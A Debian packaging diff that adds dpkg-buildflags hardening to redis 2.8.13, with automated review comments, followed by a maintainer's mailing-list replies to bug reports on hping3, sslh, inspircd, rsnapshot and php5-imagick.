@@ -1,3 +1,12 @@
+redis (2:2.8.13-3.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Use dpkg-buildflags CFLAGS, CPPFLAGS (patch upstream Makefile) and
+LDFLAGS, also use pie and relro via DEB_BUILD_MAINT_OPTIONS
+  * Call make V=1 to show gcc command lines (blhc) and enable parallel build
+
+ -- Guillaume Delacour g...@iroqwa.org  Fri, 05 Sep 2014 09:49:19 +0200
+
 redis (2:2.8.13-3) unstable; urgency=low
 
   * Correct permissions of our /var directories by chowning them recursively.
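Review bot: The 2:2.8.13-3.1 entry has no Closes: reference; add (Closes: #760567) to the dpkg-buildflags bullet so the upload closes the report this diff is attached to.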
diff -Nru redis-2.8.13/debian/patches/04-dpkg-buildflags.diff redis-2.8.13/debian/patches/04-dpkg-buildflags.diff
--- redis-2.8.13/debian/patches/04-dpkg-buildflags.diff	1970-01-01 01:00:00.0 +0100
+++ redis-2.8.13/debian/patches/04-dpkg-buildflags.diff	2014-09-05 12:16:02.0 +0200
@@ -0,0 +1,43 @@
+Author: Guillaume Delacour g...@iroqwa.org
+Subject: Add CPPFLAGS in upstream makefiles
+Last-Update: 2014-09-05
+
+Index: redis-2.8.13/src/Makefile
+===
+--- redis-2.8.13.orig/src/Makefile
 redis-2.8.13/src/Makefile
+@@ -87,7 +87,7 @@ ifeq ($(MALLOC),jemalloc)
+ 	FINAL_LIBS+= -ljemalloc
+ endif
+ 
+-REDIS_CC=$(QUIET_CC)$(CC) $(FINAL_CFLAGS)
++REDIS_CC=$(QUIET_CC)$(CC) $(FINAL_CFLAGS) $(CPPFLAGS)
+ REDIS_LD=$(QUIET_LINK)$(CC) $(FINAL_LDFLAGS)
+ REDIS_INSTALL=$(QUIET_INSTALL)$(INSTALL)
+ 
+Index: redis-2.8.13/deps/linenoise/Makefile
+===
+--- redis-2.8.13.orig/deps/linenoise/Makefile
 redis-2.8.13/deps/linenoise/Makefile
+@@ -6,7 +6,7 @@ R_CFLAGS= $(STD) $(WARN) $(OPT) $(DEBUG)
+ R_LDFLAGS= $(LDFLAGS)
+ DEBUG= -g
+ 
+-R_CC=$(CC) $(R_CFLAGS)
++R_CC=$(CC) $(R_CFLAGS) $(CPPFLAGS)
+ R_LD=$(CC) $(R_LDFLAGS)
+ 
+ linenoise.o: linenoise.h linenoise.c
+Index: redis-2.8.13/deps/hiredis/Makefile
+===
+--- redis-2.8.13.orig/deps/hiredis/Makefile
 redis-2.8.13/deps/hiredis/Makefile
+@@ -28,7 +28,7 @@ CC:=$(shell sh -c 'type $(CC) /dev/null
+ OPTIMIZATION?=-O3
+ WARNINGS=-Wall -W -Wstrict-prototypes -Wwrite-strings
+ DEBUG?= -g -ggdb
+-REAL_CFLAGS=$(OPTIMIZATION) -fPIC $(CFLAGS) $(WARNINGS) $(DEBUG) $(ARCH)
++REAL_CFLAGS=$(OPTIMIZATION) -fPIC $(CFLAGS) $(WARNINGS) $(DEBUG) $(ARCH) $(CPPFLAGS)
+ REAL_LDFLAGS=$(LDFLAGS) $(ARCH)
+ 
+ DYLIBSUFFIX=so
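Review bot: The patch adds $(CPPFLAGS) to the compile commands of src, deps/linenoise and deps/hiredis only; any other component built under deps/ would still be compiled without -D_FORTIFY_SOURCE=2, so check every compile line of the V=1 log before relying on it. In deps/hiredis the variable is appended inside REAL_CFLAGS rather than on the compiler command as in the other two Makefiles, which deserves a word in the header, and the header has no Forwarded field saying whether this was sent upstream.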
diff -Nru redis-2.8.13/debian/patches/series redis-2.8.13/debian/patches/series
--- redis-2.8.13/debian/patches/series	2014-08-05 18:16:56.0 +0200
+++ redis-2.8.13/debian/patches/series	2014-09-05 14:04:24.0 +0200
@@ -1,3 +1,4 @@
 01-fix-ftbfs-on-kfreebsd.diff -p1
 02-fix-ftbfs-on-kfreebsd -p1
 03-use-system-jemalloc.diff -p1
+04-dpkg-buildflags.diff -p1
diff -Nru redis-2.8.13/debian/rules redis-2.8.13/debian/rules
--- redis-2.8.13/debian/rules	2014-08-05 18:16:56.0 +0200
+++ redis-2.8.13/debian/rules	2014-09-05 14:18:15.0 +0200
@@ -1,6 +1,17 @@
 #!/usr/bin/make -f
 
-unexport CFLAGS
+export DEB_BUILD_MAINT_OPTIONS = hardening=+all
+
+CPPFLAGS:=$(shell dpkg-buildflags --get CPPFLAGS)
+CFLAGS:=$(shell dpkg-buildflags --get CFLAGS)
+LDFLAGS:=$(shell dpkg-buildflags --get LDFLAGS)
+export CPPFLAGS CFLAGS LDFLAGS
+
+ifneq (,$(filter parallel=%,$(DEB_BUILD_OPTIONS)))
+	NUMJOBS = $(patsubst parallel=%,%,$(filter parallel=%,$(DEB_BUILD_OPTIONS)))
+	MAKEFLAGS += -j$(NUMJOBS)
+	export MAKEFLAGS
+endif
 
 ifneq (,$(filter $(shell dpkg-architecture -qDEB_HOST_ARCH),armel hurd-i386 kfreebsd-amd64 kfreebsd-i386 s390 sparc))
 export FORCE_LIBC_MALLOC = yes
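Review bot: The three $(shell dpkg-buildflags --get ...) calls will not see DEB_BUILD_MAINT_OPTIONS: GNU make before 4.4 does not pass variables exported in the makefile to $(shell), so hardening=+all is ignored there and the pie flags announced in the changelog never reach CFLAGS or LDFLAGS. Put the variable on the command itself, as in $(shell DEB_BUILD_MAINT_OPTIONS=hardening=+all dpkg-buildflags --get CFLAGS), or include /usr/share/dpkg/buildflags.mk, which forwards it. The removed unexport CFLAGS was presumably there for a reason, so the changelog should also say why exporting CFLAGS to the upstream Makefiles is now safe.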
@@ -14,6 +25,9 @@
 
 override_dh_auto_install:
 
+override_dh_auto_build:
+	dh_auto_build --parallel -- V=1
+
 clean:
 	dh $@
 	rm -f src/release.h
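Review bot: dh_auto_build --parallel duplicates the MAKEFLAGS += -j$(NUMJOBS) block added at the top of the file; both take the job count from DEB_BUILD_OPTIONS, so keep one mechanism. If --parallel stays, check that the debhelper 7 version the package build-depends on supports it, or raise the build dependency.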


Bug#711075: hping3: Option '-z'/increasing TTL for traceroute mode doesn't work

2014-09-04 Thread Guillaume Delacour
On Tuesday 04 June 2013 at 14:55 +0200, christian mock wrote:
 Package: hping3
 Version: 3.a2.ds2-6
 Severity: normal
 
 Dear Maintainer,

First, sorry for the delay.

 
 In the current version of hping3, there seems to be no way to use
 Ctrl-Z to increase the TTL in the traceroute mode (-T). Neither with
 nor without the -z option does this work.
 
 In earlier versions, hping3 intercepted Ctrl-Z, now it just
 backgrounds due to shell job control.

Please note that the version 3.a2.ds2-6 was unchanged between Debian 6
and 7.

Anyway, I don't reproduce this; every time I press Ctrl-z, the ttl is
increased (Gnome terminal 3.4.1.1). If I use --unbind, the Ctrl-z is
ignored by hping3, so the process goes in background.

Can you re-test the feature and maybe with another environment?

 
 -- System Information:
 Debian Release: 7.0
   APT prefers stable-updates
   APT policy: (500, 'stable-updates'), (500, 'stable')
 Architecture: amd64 (x86_64)
 Foreign Architectures: i386
 
 Kernel: Linux 3.2.0-4-amd64 (SMP w/8 CPU cores)
 Locale: LANG=C, LC_CTYPE=de_AT.UTF-8 (charmap=UTF-8)
 Shell: /bin/sh linked to /bin/bash
 
 Versions of packages hping3 depends on:
 ii  libc6   2.13-38
 ii  libpcap0.8  1.3.0-1
 ii  tcl8.4  8.4.19-5
 
 hping3 recommends no packages.
 
 hping3 suggests no packages.
 
 -- no debconf information

-- 
Guillaume Delacour g...@iroqwa.org




Bug#688458: Conflicting types for variable ip_optlen

2014-09-04 Thread Guillaume Delacour
On Saturday 22 September 2012 at 22:07 +0100, Michael Tautschnig wrote:
 Package: hping3
 Version: 3.a2.ds2-6
 
 While compiling the package using our research compiler infrastructure we
 noticed the following conflicting declaration of the variable ip_optlen:
 
 - globals.h: extern char ip_optlen;
 - main.c: unsigned ip_optlen;

 This will cause undefined behaviour if the value of ip_optlen exceeds 127 for
 any architecture with signed char type. This is also problematic in other 
 cases
 where ip_optlen stores the return value of functions returning unsigned char.

Good catch. I understand the possible collision, but I don't measure
well the real impact in the source code.

Hping3 author is not active anymore on this project and I can only
maintain the packaging or minor modifications, so unless there is a
blocker issue, I'll not investigate the problem further (but another
patch for hping3 could be integrated in Debian if someone wants to take
the time).

Thanks.

 
 Best,
 Michael
 

-- 
Guillaume Delacour g...@iroqwa.org




Bug#735922: wishlist: document logging in /var/log/auth.log

2014-07-14 Thread Guillaume Delacour
On Saturday 18 January 2014 at 17:28 +0100, Geert Stappers wrote:
 Package: sslh
 Version: 1.13b-3.2
 Severity: minor
 
 Dear Maintainer,
 
 
 When I have logged in through sslh, my connection is from localhost. I
 do understand this artifact of sslh. It did take me some time to find
 out where the connection came from.
 
 It would be nice if the manual page says that logging
 is done in /var/log/auth.log

Yes you're right, sslh uses the LOG_AUTH facility (in common.c:488) which is
on Debian systems logged in /var/log/auth.log (in /etc/rsyslog.conf:61).

I'll propose upstream to add a syslog paragraph in the manpage to
document this.

 
 
 Thank you for maintaining sslh in Debian.
 
 
 Cheers
 Geert Stappers
 
 
 -- System Information:
 Debian Release: 7.0
   APT prefers stable-updates
   APT policy: (500, 'stable-updates'), (500, 'stable')
 Architecture: amd64 (x86_64)
 
 Kernel: Linux 3.2.0-4-amd64 (SMP w/4 CPU cores)
 Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)
 Shell: /bin/sh linked to /bin/dash
 
 Versions of packages sslh depends on:
 ii  adduser   3.113+nmu3
 ii  debconf   1.5.49
 ii  libc6 2.13-38
 ii  libconfig91.4.8-5
 ii  lsb-base  4.1+Debian8
 ii  update-inetd  4.43
 
 Versions of packages sslh recommends:
 ii  apache2  2.2.22-13
 ii  apache2-mpm-prefork [httpd]  2.2.22-13
 ii  openssh-server [ssh-server]  1:6.0p1-4
 
 Versions of packages sslh suggests:
 pn  openbsd-inetd | inet-superserver  none
 
 -- Configuration Files:
 /etc/default/sslh changed:
 RUN=yes
 DAEMON=/usr/sbin/sslh
 DAEMON_OPTS=--user sslh --listen 0.0.0.0:443 --numeric --ssh 127.0.0.1:22 
 --ssl 127.0.0.1:443 --pidfile /var/run/sslh/sslh.pid
 
 
 -- debconf information:
 * sslh/inetd_or_standalone: standalone
 

-- 
Guillaume Delacour g...@iroqwa.org




Bug#740560: sslh fails to start with systemd as PID=1

2014-07-14 Thread Guillaume Delacour
On Sunday 02 March 2014 at 22:35 +0100, Gilles Filippini wrote:
 Package: sslh
 Version: 1.15-1
 Severity: normal
 
 Hi,

Hi,

 
 I've just switched to systemd as init system on my box, and after reboot
 sslh wasn't running. From what I understand the cause of the failure is
 a missing /var/run/sslh directory.
 
 After adding the settings below to the sslh.service file, I can start it
 manually using invoke-rc.d but it keeps failing at boot time:
 ExecStartPre=/bin/mkdir -p /var/run/sslh
 ExecStartPre=/bin/chown -R sslh:sslh /var/run/sslh/

Instead, I can propose to use a /usr/lib/tmpfiles.d/sslh.conf file like
this:

d /run/sslh 0755 sslh sslh -

I'll test this soon, but maybe you'll test this before me.

 
 Please let me know about any missing information in this report.
 
 Thanks,
 
 _g.

-- 
Guillaume Delacour g...@iroqwa.org




Bug#669177: inspircd: unversioned dependency on package hurd on hurd-i386

2014-07-13 Thread Guillaume Delacour
On Friday 27 April 2012 at 09:32 +0100, Jonathan Wiltshire wrote:
 Hi!
 
 On 2012-04-26 19:33, Guillaume Delacour wrote:
  On Wednesday 18 April 2012 at 00:01 +0100, Jonathan Wiltshire wrote:
  E: inspircd: depends-on-essential-package-without-using-version 
  depends: hurd
 
  As inspircd uses libpthread, it seems to be a bug and will be fixed 
  with
  the next upload of eglibc that include libpthread (as #debian-hurd
  folks).
 
 Ok. In that case please clone+retitle+reassign this bug to hurd and set 
 appropriate Blocks so that it is documented somewhere.

I'm sorry, I didn't manage to find the origin of this bug, closing it
now.

 
 Thanks
 
 
 

-- 
Guillaume Delacour g...@iroqwa.org




Bug#668253: inspircd: does not close stdin or stderr on startup, consumes 100% cpu

2014-07-13 Thread Guillaume Delacour
On Wednesday 13 June 2012 at 20:24 +0930, Michael wrote:
 Hello,
 
 This bug is marked as fixed-upstream, however the bug has not been
 fixed in Debian stable.
 
 For me, the 100% CPU issue occurs with inspircd
 1.1.22+dfsg-4+squeeze1, but not inspircd 1.1.22+dfsg-4, on two
 different systems.  To me this indicates a bug in the security update.
 
 Can this fix please be backported into stable?  It makes the software
 unusable otherwise, and I have to hold off on applying the security
 update or upgrade to testing.

Instead of backporting the fix, the new version 2.0.5 (which fixes many
issues) was backported on 29 Mar 2013 into stable (which is
Squeeze oldstable today).

Sorry for the late answer.

 
 Thanks,
 
 
 Michael
 
 
 

-- 
Guillaume Delacour g...@iroqwa.org




Bug#724874: [PKG-IRC-Maintainers] Bug#724874: inspircd: 2.0.15 now available

2014-06-16 Thread Guillaume Delacour
Hi,

On Monday 16 June 2014 at 14:45 +, Jeremy Stanley wrote:
 On 2014-06-16 15:29:20 +0800 (+0800), David Adam wrote:
  I removed my package so that Guillaume could upload his, but I
  think that took his 2.0.16 package away too - sorry. Guillaume does
  have a 2.0.16 package available.
 
 It would be great to get that moving again... there are a lot of bug
 fixes between the 2.0.5 currently in Sid/Jessie and 2.0.16, so would
 be disappointing to see Jessie release with those issues. If the
 2.0.16 source package is somewhere accessible or if Guillaume could
 put it back up on mentors.d.n, I'd be happy to review and test it
 (though not being a DD I can't sponsor of course).

I re-uploaded it again on mentors, thanks for the feedback!

-- 
Guillaume Delacour g...@iroqwa.org




Bug#724874: [PKG-IRC-Maintainers] Bug#724874: Bug#724874: inspircd: 2.0.15 now available

2014-03-02 Thread Guillaume Delacour
Hi all,

On Saturday 01 March 2014 at 15:14 +0100, Christoph Biedl wrote:
 Christoph Biedl wrote...
 
  Now I'd like to suggest the following procedure: Unless nobody objects
  by Thu March 6th, feel free to upload your inspircd packaging.
 

I've prepared a package a few days ago but didn't finish it; here is the
changelog:

  * New upstream release (Closes: #724874), enable m_regex_stdlib new
    module
  * Drop patches accepted upstream:
    + debian/patches/01_spelling_error.diff
    + debian/patches/03_CVE-2012-1836.diff (cherry-picked)
    + debian/patches/04_FTBFS_kfreebsd.diff
    + debian/patches/05_FTBFS_gcc-4.7.diff
  * debian/docs: docs/README has moved to README.md
  * debian/examples: examples are now in docs/conf
  * Bump debhelper compat to 9
  * Remove Bradley Smith as uploaders (Closes: #674890)
  * debian/watch: update based on sepwatch
  * Add systemd support:
    + Build-Depends on dh-systemd (= 1.5)
    + Add debian/inspircd.service, debian/inspircd.tmpfiles.d.conf
    + debian/rules: call generic dh with --with systemd
  * debian/control: Change Vcs-{Svn,Browser}, point to anonscm.debian.org
    and bump to Standards-Version 3.9.5 (no changes needed)
  * debian/patches/02_disable_rpath_for_extra_modules.diff: Refresh
    according upstream modules changes

 -- Guillaume Delacour g...@iroqwa.org  Sat, 01 Feb 2014 15:36:52 +0100


I've started to rewrite debian/copyright too, I can just finish it.

I propose to integrate David's diff to my version and add it to
uploaders today or within the next week.


-- 
Guillaume Delacour g...@iroqwa.org




Bug#717451: Backups broken when ssh_args are set

2013-07-28 Thread Guillaume Delacour
On Thursday 25 July 2013 at 18:12 -0400, Michel L. wrote:
 Package: rsnapshot
 Version: 1.3.1-4
 Followup-For: Bug #717451
 
 Dear Maintainer,
 
 Just want to confirm that rsnapshot is failing here as well. When using
 ssh_args, for example:
 
 ssh_args	-o BatchMode=yes -p 1234
 
 
 I downgraded to rsnapshot 1.3.1-3[0], to get my backups working again. 
 
 [0] http://snapshot.debian.org/package/rsnapshot/1.3.1-3/#rsnapshot_1.3.1-3 
 
 

You're both right, the ssh args are broken since I've applied the patch
10_space_destdir.diff [0].

The last upstream version is also impacted by these changes [1]. The
solution proposed is the same as the first reporter of this bug and
upstream is now thinking about a way to properly handle rsync --rsh=
arguments.

As rsnapshot remote backup with ssh is now broken, I'll include the
proposed workaround as a countermeasure (at least temporarily).

[0]:
http://rsnapshot.cvs.sourceforge.net/viewvc/rsnapshot/rsnapshot/rsnapshot-program.pl?revision=1.414view=markup
[1]: https://github.com/DrHyde/rsnapshot/pull/1

-- 
Guillaume Delacour g...@iroqwa.org




Bug#717940: Incorrect description of rsync_numtries in rsnapshot.conf

2013-07-28 Thread Guillaume Delacour
On Saturday 27 July 2013 at 00:59 +0200, Jonathan Leroy wrote:
 Package: rsnapshot
 Version: 1.3.1-1
 Severity: minor
 Tags: upstream
 
 Hi,

Hi,

 
 The description of rsync_numtries setting in rsnapshot.conf seems to
 be incorrect:
 
 # Number of rsync re-tries. If you experience any network problems or
 # network card issues that tend to cause ssh to crap-out with
 # Corrupted MAC on input errors, for example, set this to a non-zero
 # value to have the rsync operation re-tried
 #
 #rsync_numtries 0

The configuration says set this to a non-zero value, what do you
suggest to be more precise? (I never use this option, but think it's
quite clear like this). I agree that the default commented value should
be 1 instead of 0.

-- 
Guillaume Delacour g...@iroqwa.org




Bug#710283: inspircd: Starting Inspircd fails on writing to PID file

2013-06-02 Thread Guillaume Delacour
On Wednesday 29 May 2013 at 16:45 +0200, Tim Gouma wrote:
 Package: inspircd
 Version: 2.0.5-1+b1
 Severity: grave
 Tags: upstream
 Justification: renders package unusable

Hi,

 
 After configuration Inspircd always fails to start with the following error 
 in /var/log/inspircd.log
 Wed May 29 16:33:24 2013: Failed to write PID-file 'data/inspircd.pid', 
 exiting. But in the config file the pid file location is configured as 
 /var/run/inspircd.pid
 
 -- System Information:
 Debian Release: 7.0
   APT prefers stable
   APT policy: (500, 'stable')
 Architecture: i386 (x86_64)
 
 Kernel: Linux 3.2.0-4-amd64 (SMP w/1 CPU core)
 Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
 Shell: /bin/sh linked to /bin/dash
 
 Versions of packages inspircd depends on:
 ii  libc6 2.13-38
 ii  libgcc1   1:4.7.2-5
 ii  libgeoip1 1.4.8+dfsg-3
 ii  libgnutls26   2.12.20-6
 ii  libldap-2.4-2 2.4.31-1+nmu2
 ii  libmysqlclient18  5.5.31+dfsg-0+wheezy1
 ii  libpcre3  1:8.30-5
 ii  libpq59.2.4-1.pgdg70+1
 ii  libsqlite3-0  3.7.13-1+deb7u1
 ii  libstdc++64.7.2-5
 ii  libtre5   0.8.0-3
 ii  lsb-base  4.1+Debian8
 ii  zlib1g1:1.2.7.dfsg-13
 
 inspircd recommends no packages.
 
 Versions of packages inspircd suggests:
 pn  gnutls-binnone
 pn  ldap-server   none
 pn  mysql-server  none
 pn  postgresqlnone
 pn  sqlite3   none
 
 -- Configuration Files:
 /etc/default/inspircd changed:
 INSPIRCD_ENABLED=1
 
 /etc/inspircd/inspircd.conf changed:
 pid file=/var/run/inspircd.pid /
Problem with /^

You've edited your configuration and added a slash before , this is why
inspircd fails to start (reproduced with wheezy chroot). The correct
(package default) directive might be:

   pid file=/var/run/inspircd.pid


 - Cut Irrelevant Parts of Config file -
 
 -- no debconf information
 

-- 
Guillaume Delacour g...@iroqwa.org




Bug#678333: fails to terminate it's own testcode

2012-06-21 Thread Guillaume Delacour
On Wed, Jun 20, 2012 at 11:48:32PM +0200, Andreas Barth wrote:
 Package: sslh
 Version: 1.13b-2
 Severity: serious
 
 
 Hi,

Hi,

 
 this package fails to terminate its testcode properly (at least on
 mipsel) and therefore requires the buildd to timeout the build (and
 wastes endless time):
 
 buildd   18416 1  0 21:27 ?00:00:00 sh -c ./echosrv --listen 
 ip6-localhost:9000 --prefix 'ssh: '
 buildd   18417 1  0 21:27 ?00:00:00 sh -c ./echosrv --listen 
 ip6-localhost:9001 --prefix 'ssl: '
 buildd   18419 18416  0 21:27 ?00:00:00 ./echosrv --listen 
 ip6-localhost 9000 --prefix ssh:
 buildd   18420 18417  0 21:27 ?00:00:00 ./echosrv --listen 
 ip6-localhost 9001 --prefix ssl:
 buildd   18421 18419  0 21:27 ?00:00:00 ./echosrv --listen 
 ip6-localhost 9000 --prefix ssh:
 buildd   18422 18420  0 21:27 ?00:00:00 ./echosrv --listen 
 ip6-localhost 9001 --prefix ssl:
 
 Please make sure whatever happens that the testcode is terminated.

You're absolutely right; I didn't see that *ALL* buildds were waiting for the process
to be terminated (Build killed with signal TERM after 150 minutes of
inactivity)

Upstream calls killall echosrv in the testcode, but the package (psmisc) is
not essential, so not installed on buildd. I've reproduced the problem with
pbuilder and I'll just add a Build-Depends on psmisc in 1.13b-3.

 
 
 Andi
 
 

-- 
Guillaume Delacour




Bug#660385: php5-imagick: ignores memory limit

2012-04-30 Thread Guillaume Delacour
Hello,

The resource type RESOURCETYPE_MEMORY on php-imagick corresponds to
ImageMagick MAGICK_MEMORY_LIMIT, which defines how much memory could be
used to reserve memory for tasks; when the limit is reached, cached
memory-mapped disk is used:

http://fr2.php.net/manual/en/imagick.setresourcelimit.php
http://www.imagemagick.org/script/resources.php#environment

So whatever value you use in setResourceLimit for RESOURCETYPE_MEMORY,
the tasks are processed (less or more quickly).

-- 
Guillaume Delacour g...@iroqwa.org




Bug#650406: sslh: does not start automatically during Debian init process

2012-04-30 Thread Guillaume Delacour
Hello,

On Wednesday 25 January 2012 at 00:07 +0100, Philippe Basinska wrote:
 On 22/01/2012 21:26, Guillaume Delacour wrote:
  Hello,
 
  On Saturday 17 December 2011 at 21:34 +0100, Guillaume Delacour wrote:
  On Tuesday 29 November 2011 at 16:51 +0100, Philippe Basinska wrote:
  Package: sslh
  Version: 1.6i-4
  Severity: normal
  Tags: patch
 
  Hello,
 
  I didn't tag the issue with 'squeeze' label since I can't test it right
  now on a testing system. However, init script of sslh seems different in
  version 1.9.
 
  Whatever, my stable sslh daemon does not start automatically with Debian
  Squeeze. The command `invoke-rc.d sslh start` is good enough to fix the
  issue until next reboot.
 
  Any news on this issue ? Is my explanation correct ?
 
 
 
 Hi Guillaume,
 
 I just rolled back my hack to try your solution.
 
 I mean that I removed the LSB tag to start sshd before sslh and I 
 updated the SysV init links. Then I added the option to log stuff in 
 /var/log/boot.
 
 Now, sslh starts during each boot. Even if I didn't change anything in 
 my network interface. I tried a few times to be sure but it works fine 
 and I got no relevant information in log (indeed, the sslh daemon 
 starts...).
 
 Starting ssl/ssh multiplexer : sslh
 SSL addr: 127.0.0.1:443 (after timeout 2s)
 SSH addr: 127.0.0.1:22
 listening on 192.168.2.1:443
 turning into sslh
 
 I assume the problem disappeared because I changed rc2.d links. 
 Actually, both ssh and sslh start much later so the network must be 
 available.
 
 server-bl:~# ls -l /etc/rc2.d/ | grep ssh\|sslh
 lrwxrwxrwx 1 root root  13 25 janv. 00:03 S22ssh - ../init.d/ssh
 lrwxrwxrwx 1 root root  14 24 janv. 23:58 S24sslh - ../init.d/sslh
 
 See you,
 

So I close this bug report, feel free to reopen if you have other issues
about this.


-- 
Guillaume Delacour g...@iroqwa.org




Bug#669177: inspircd: unversioned dependency on package hurd on hurd-i386

2012-04-26 Thread Guillaume Delacour
Hi,

On Wednesday 18 April 2012 at 00:01 +0100, Jonathan Wiltshire wrote:
 Source: inspircd
 Version: 2.0.5-1
 Severity: important 
 
 This is a lintian error:
 
 E: inspircd: depends-on-essential-package-without-using-version depends: hurd

As inspircd uses libpthread, it seems to be a bug and will be fixed with
the next upload of eglibc that include libpthread (as #debian-hurd
folks).

 
 -- System Information:
 Debian Release: wheezy/sid
   APT prefers unstable
   APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 
 'experimental')
 Architecture: amd64 (x86_64)
 
 Kernel: Linux 3.2.0-2-amd64 (SMP w/2 CPU cores)
 Locale: LANG=en_GB.utf8, LC_CTYPE=en_GB.utf8 (charmap=UTF-8)
 Shell: /bin/sh linked to /bin/bash
 
 
 

-- 
Guillaume Delacour g...@iroqwa.org




Bug#660372: fix cmd_postexec - allow unmounting of snapshot root by cmd_postexec config option

2012-04-10 Thread Guillaume Delacour
tags 660372 moreinfo
thanks

Hi,

On Saturday 18 February 2012 at 18:53 +0100, Mike Gabriel wrote:
 Package: rsnapshot
 Version: 1.3.1-1
 Severity: normal
 Tags: squeeze
 
 With rsnapshot from lenny it was able to copy backups to a mounted USB hard 
 disk
 and unmount the USB disk after rsnapshot had finished. For the unmounting I 
 used
 the cmd_postexec configuration parameter.
 
 With rsnapshot from squeeze this is not possible anymore. rsnapshot complains 
 with
 ,,Device or resource busy'' (meaning: the USB disk cannot be unmounted because
 rsnapshot has its current working directory within the snapshot root 
 somewhere).
 
 With this issue report I would like to provide a patch (against rsnapshot in 
 squeeze)
 that might solve the problem. (,,might'' means here: the problem occurrs at a 
 customer's
 site where I cannot test the patch ATM, but it is very likely that the patch 
 fixes the
 reported issue).

I'm not sure the problem is the cmd_{pre,post}exec commands, the following
tests work well in a squeeze chroot test environment (I only use
rsnapshot to backup to local storage):

 fake usb device disk with ext3 fs mounted on loopback

$ dd if=/dev/zero of=/tmp/usb_fake_disk bs=1M count=128
$ sudo mkfs -t ext3 /tmp/usb_fake_disk
$ sudo mount -o loop /tmp/usb_fake_disk /mnt/ && ls /mnt \
  && sudo umount /mnt/

 minimal rsnapshot.conf

$ egrep -v '^($|#)' /etc/rsnapshot.conf 
config_version  1.2
snapshot_root   /mnt/
cmd_rm  /bin/rm
cmd_rsync   /usr/bin/rsync
cmd_logger  /usr/bin/logger
cmd_preexec /bin/mount -o loop /tmp/usb_fake_disk /mnt/
cmd_postexec/bin/umount /mnt/
intervalhourly  6
intervaldaily   7
intervalweekly  4
verbose 2
loglevel3
lockfile/var/run/rsnapshot.pid
backup  /etc/   localhost/

 launch a job to validate

$ sudo rsnapshot -v hourly
echo 19163  /var/run/rsnapshot.pid 
/bin/mount -o loop /tmp/usb_fake_disk /mnt/ 
mkdir -m 0755 -p /mnt/hourly.0/ 
/usr/bin/rsync -a --delete --numeric-ids --relative
--delete-excluded /etc \
/mnt/hourly.0/localhost/ 
touch /mnt/hourly.0/ 
/bin/umount /mnt/ 
rm -f /var/run/rsnapshot.pid 

$ sudo mount -o loop /tmp/usb_fake_disk /mnt/ \
  && ls /mnt/hourly.0/localhost/
etc


Can you check the issue by running the rsnapshot cron jobs with the -v
flag and redirect stderr to a logfile to verify that the problem is not
the usb disk itself (too long to umount, etc.) or its usage (use lsof or
fuser to verify that no other task uses the mountpoint, etc.)?

It would be great to have information about this issue, to definitively
eliminate or not cmd_{pre,post}exec behavior (and maybe great to
validate your patch too).

Thanks.

 
 The patch will be sent with a follow-up mail.
 
 -- System Information:
 Debian Release: 6.0.4
   APT prefers stable
   APT policy: (500, 'stable')
 Architecture: amd64 (x86_64)
 
 Kernel: Linux 2.6.32-5-amd64 (SMP w/4 CPU cores)
 Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
 Shell: /bin/sh linked to /bin/dash
 
 Versions of packages rsnapshot depends on:
 ii  liblchown-perl 1.01-1Perl interface to the lchown() 
 sys
 ii  logrotate  3.7.8-6   Log rotation utility
 ii  perl   5.10.1-17squeeze3 Larry Wall's Practical 
 Extraction 
 ii  rsync  3.0.7-2   fast remote file copy program 
 (lik
 
 Versions of packages rsnapshot recommends:
 ii  openssh-client1:5.5p1-6+squeeze1 secure shell (SSH) client, for 
 sec
 
 rsnapshot suggests no packages.
 
 -- no debconf information
 
 
 

-- 
Guillaume Delacour g...@iroqwa.org




Bug#665260: sslh: FTBFS: Can't exec lcov: No such file or directory at ./t line 298.

2012-03-22 Thread Guillaume Delacour
  listening on:
  localhost:9002
  localhost:9002
  timeout to ssh: 2
  listening to 2 addresses
  localhost:9002:bind: Address already in use
  exited with 1
  #   Failed test 'Exit status if can't open PID file'
  #   at ./t line 265.
  #  got: '1'
  # expected: '3'
  not ok 25 - Exit status if can't open PID file

I think this is the same problem here.

  ***Test: Can't bind address
  spawned 19256
  ssh addr: localhost:9000. libwrap service: sshd family 10 10
  ssl addr: localhost:9001. libwrap service: (null) family 10 10
  listening on:
  fx-in-f106.1e100.net:9000
  timeout to ssh: 2
  listening to 1 addresses
  fx-in-f106.1e100.net:9000:bind: Cannot assign requested address
  exited with 1
  ok 26 - Exit status if can't bind address
  ***Test: Can't resolve address
  spawned 19257
  Name or service not known `blahblah.dontexist'
  exited with 4
  ok 27 - Exit status if can't resolve address
  Can't exec lcov: No such file or directory at ./t line 298.
  Can't exec genhtml: No such file or directory at ./t line 299.
  Can't exec killall: No such file or directory at ./t line 301.
  # Looks like you failed 2 tests of 27.

The problem is just here; the upstream test suite fails on 2 tests, see
above.

  1..27
  make[1]: *** [test] Error 2
 
 The full build log is available from:
http://people.debian.org/~lucas/logs/2012/03/21/sslh_1.10-3.log
 
 A list of current common problems and possible solutions is available at 
 http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute!
 
 About the archive rebuild: The rebuild was done on about 50 AMD64 nodes
 of the Grid'5000 platform, using a clean chroot.  Internet was not
 accessible from the build systems.
 
 

[1]: http://bugs.debian.org/660269

-- 
Guillaume Delacour g...@iroqwa.org




Bug#660269: FTBFS on kfreebsd-*: cat: /tmp/sslh_test.pid: No such file or directory

2012-03-21 Thread Guillaume Delacour
On Tuesday 20 March 2012 at 21:58 +0100, Guillaume Delacour wrote:
 On Wednesday 07 March 2012 at 02:33 +0100, Guillaume Delacour wrote:
  
  I'm afraid there is another problem with fano and field schroots:
  127.0.0.1 appears to point twice to localhost, so sslh tries to listen
  twice to localhost (--listen 127.0.0.1:$sslh_port in t test file).
  I've pinged christoph on irc to know if it is possible to fix /etc/hosts
  on these boxes, otherwise I'll refresh the patch I've made to bind to
  127.0.0.1 and not localhost.
  
  --
  Guillaume Delacour g...@iroqwa.org
 
 The 1.10-3 version does not completely fix the problem: there are still
 other issues with localhost entries in /etc/hosts on the buildd:
 
 ***Test: Changing to non-existant username
 spawned 21450
 ssh addr: localhost:9000. libwrap service: sshd family 28 28
 ssl addr: localhost:9001. libwrap service: (null) family 28 28
 listening on:
   localhost:9002
   localhost:9002
 timeout to ssh: 2
 listening to 2 addresses
